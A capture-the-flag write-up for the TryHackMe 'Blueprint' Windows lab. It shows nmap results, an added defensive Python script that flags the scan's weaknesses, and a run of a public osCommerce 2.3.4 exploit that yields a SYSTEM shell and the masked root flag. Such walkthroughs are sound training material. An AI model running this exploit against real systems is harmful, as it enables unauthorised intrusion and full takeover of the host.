THM: Blueprint

Title: Blueprint
Description: Hack into this Windows machine and escalate your privileges to Administrator.
Difficulty: Easy
Tags:
Nmap
First we scan for all open TCP ports, with version detection and default scripts enabled.
# nmap -p- -T4 -sV -sC 10.10.179.12 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-13 08:24 BST
Stats: 0:11:53 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 59.31% done; ETC: 08:44 (0:08:09 remaining)
Nmap scan report for 10.10.179.12
Host is up (0.18s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: 404 - File or directory not found.
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_ssl-date: TLS randomness does not represent time
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-04-11 22:52 oscommerce-2.3.4/
| - 2019-04-11 22:52 oscommerce-2.3.4/catalog/
| - 2019-04-11 22:52 oscommerce-2.3.4/docs/
|_
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-title: Index of /
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-04-11 22:52 oscommerce-2.3.4/
| - 2019-04-11 22:52 oscommerce-2.3.4/catalog/
| - 2019-04-11 22:52 oscommerce-2.3.4/docs/
|_
|_http-title: Index of /
| http-methods:
|_ Potentially risky methods: TRACE
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -20m18s, deviation: 34m38s, median: -18s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: BLUEPRINT
| NetBIOS computer name: BLUEPRINT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-08-13T08:45:22+01:00
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:f6:b5:fd:8f:29 (unknown)
| smb2-time:
| date: 2025-08-13T07:45:24
|_ start_date: 2025-08-13T07:07:38
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1303.54 seconds
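As an added example (not part of the original writeup), here is a small Python triage of the scan output above from the defender's side: it reads nmap's normal-format report and flags the weaknesses the scan surfaces (TRACE enabled, directory listing, a version-revealing path, an expired certificate, SMB signing not enforced) so each can be tracked to a fix. The report text is a constructed excerpt of the scan shown above.

```python
import re
from datetime import datetime, timezone

# Constructed excerpt of the nmap output in the writeup (not the full scan).
SAMPLE_REPORT = """\
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-ls: Volume /
| - 2019-04-11 22:52 oscommerce-2.3.4/
| ssl-cert: Subject: commonName=localhost
|_Not valid after: 2019-11-08T23:48:47
445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1
Host script results:
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_ Message signing enabled but not required
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\b")
VERSION_PATH_RE = re.compile(r"\b([a-z]+)-(\d+(?:\.\d+)+)/")  # e.g. oscommerce-2.3.4/


def triage(report, now=None):
    """Return de-duplicated (port, finding) pairs for the weaknesses in a .nmap report."""
    now = now or datetime.now(timezone.utc)
    findings, port = [], "host"

    def note(msg):
        if (port, msg) not in findings:
            findings.append((port, msg))

    for raw in report.splitlines():
        m = PORT_RE.match(raw)
        if m:
            port = m.group(1)          # script lines that follow belong to this port
            continue
        if raw.startswith("Host script results"):
            port = "host"              # host-level scripts (SMB) follow
            continue
        line = raw.lstrip("|_ ").strip()  # drop nmap's script-output prefix
        if line.startswith("Potentially risky methods:") and "TRACE" in line:
            note("HTTP TRACE enabled")
        elif line.startswith("http-ls:"):
            note("directory listing enabled")
        elif line.startswith("Not valid after:"):
            expiry = datetime.fromisoformat(line.split(": ", 1)[1]).replace(tzinfo=timezone.utc)
            if expiry < now:
                note("TLS certificate expired %s" % expiry.date())
        elif "message_signing: disabled" in line or "not required" in line:
            note("SMB signing not enforced")
        elif VERSION_PATH_RE.search(line):
            vm = VERSION_PATH_RE.search(line)
            note("%s %s exposed by path" % (vm.group(1), vm.group(2)))
    return findings


if __name__ == "__main__":
    for port, issue in triage(SAMPLE_REPORT):
        print(port, issue)
```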
Website (8080)
Based on the nmap results, osCommerce is running and the version number is included in the subdirectory name, oscommerce-2.3.4/. Looking on Exploit-DB we see a number of exploits exist, several of which rely on the install directory still being present. Checking in our browser, we can see that it is still there.
We pick an exploit, run it, and get a shell back as SYSTEM. Then it is just a case of reading the flag from the Administrator account's desktop.
# python3 50128.py http://10.10.179.12:8080/oscommerce-2.3.4/catalog/
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: nt authority\system
RCE_SHELL$ dir ..\..\..\..\..\..\..\..\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 14AF-C52C
Directory of C:\Users\Administrator\Desktop
11/27/2019 07:15 PM <DIR> .
11/27/2019 07:15 PM <DIR> ..
11/27/2019 07:15 PM 37 root.txt.txt
1 File(s) 37 bytes
2 Dir(s) 19,509,260,288 bytes free
RCE_SHELL$ type C:\Users\Administrator\Desktop\root.txt.txt
THM{ae****************************ee}